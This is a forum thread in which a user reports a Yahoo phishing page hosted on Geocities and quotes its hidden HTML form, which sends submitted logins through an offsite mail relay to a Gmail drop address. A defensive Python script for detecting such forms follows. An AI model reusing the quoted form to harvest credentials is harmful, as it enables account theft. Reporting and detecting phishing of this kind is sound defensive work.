Interesting new phish attempt

  1. #1
    Senior Member
    Join Date
    Mar 2003
    Posts
    372

    Interesting new phish attempt

    So one of my more observant users sent me this link today.

    (click only at your own risk as I don't know what else they are doing on this page at the moment) http://www.geocities.com/ooopsss_104/

    He noticed that he had fat-fingered his Yahoo account information in the username/password fields but it seemed to accept his information anyway. So I checked it out and I found the following buried in the HTML code.


    Code:
    <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
        <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
        <INPUT TYPE="hidden" NAME="Mail_To" VALUE="takinurname@gmail.com">
        <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
        <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://www.geocities.com/got_milf.does_you_good/index.html">

    So someone has created a legit-looking Geocities/Yahoo site, put a legit-looking login screen on that site, but has modified the script to send login information to an offsite Gmail account, and offloads that email process to another website based out of Queensland, Australia.

    This is bothersome since it looks completely legit, is on a legit website, and sends you to a legit-looking error page.

    You can "login" with fake credentials and it will still accept it, showing that they are not passing your credentials on to Yahoo to verify that they are real. That will be the next step in this scam I'm sure.

    Just thought people would want to know. This site has been reported to Geocities/Yahoo already but it wouldn't hurt if a couple of others reported them also.

    I have also sent an abuse message to Gmail explaining that they are being used in this scam also.

    Give a man a match and he will be warm for a while, light him on fire and he will be warm for the rest of his life.
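
The form quoted in post #1 has three traits a defender can check for mechanically: an ACTION on a different host than the page, a password field submitted without TLS, and a hidden mail-recipient field. The following audit is an added example, not code from the thread; the hosts, the sample page and every field name in `MAIL_FIELDS` other than `Mail_To` are constructed or assumed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hidden-field names used by form-to-mail relays (assumed list; Mail_To is from the thread).
MAIL_FIELDS = {"mail_to", "recipient", "sendto"}
# Constructed sample page: placeholder hosts, same shape as the form quoted in the post.
SAMPLE_URL = "http://hosting.example/user123/"
SAMPLE_HTML = """
<FORM METHOD="POST" ACTION="http://relay.example/form/mailto.cgi">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="drop@mail.example">
<INPUT TYPE="text" NAME="login"><INPUT TYPE="password" NAME="passwd">
</FORM>
<form action="/search"><input type="text" name="q"></form>
"""

class FormAudit(HTMLParser):
    """Collect every <form> with its action, hidden fields and password inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names already
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "hidden": {}, "password": False})
        elif tag == "input" and self.forms:
            kind = a.get("type", "text").lower()
            if kind == "hidden":
                self.forms[-1]["hidden"][a.get("name", "").lower()] = a.get("value", "")
            self.forms[-1]["password"] |= kind == "password"

def audit_forms(page_url, html):
    """Return [(absolute_action, [reasons])] for forms that look like credential relays."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        action = urljoin(page_url, form["action"])
        target = urlparse(action)
        reasons = []
        if target.hostname != urlparse(page_url).hostname:
            reasons.append("off-site action")
        if form["password"] and target.scheme != "https":
            reasons.append("password sent without TLS")
        for name in sorted(MAIL_FIELDS & set(form["hidden"])):
            reasons.append(f"hidden mail recipient {name}={form['hidden'][name]}")
        if reasons:
            findings.append((action, reasons))
    return findings
```

Calling `audit_forms(SAMPLE_URL, SAMPLE_HTML)` flags only the first form; the same-site search form passes. Off-site actions also occur on legitimate pages (payment processors, single sign-on), so treat a lone "off-site action" as a lead rather than a verdict.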

  2. #2
    Member
    Join Date
    Apr 2002
    Posts
    51

    roofles

    No, this isn't a new idea, people have been faking login pages since the early days of the www. May want to report the page to Geocities though...

  3. #3
    Senior Member
    Join Date
    Mar 2003
    Posts
    372
    Now I /know/ they have been faking pages for a long time... I just haven't seen one faked ON the website they were faking.

    These people are faking Geocities on Geocities. I have seen plenty of misdirects for other sites like PayPal... this is just a first for me.
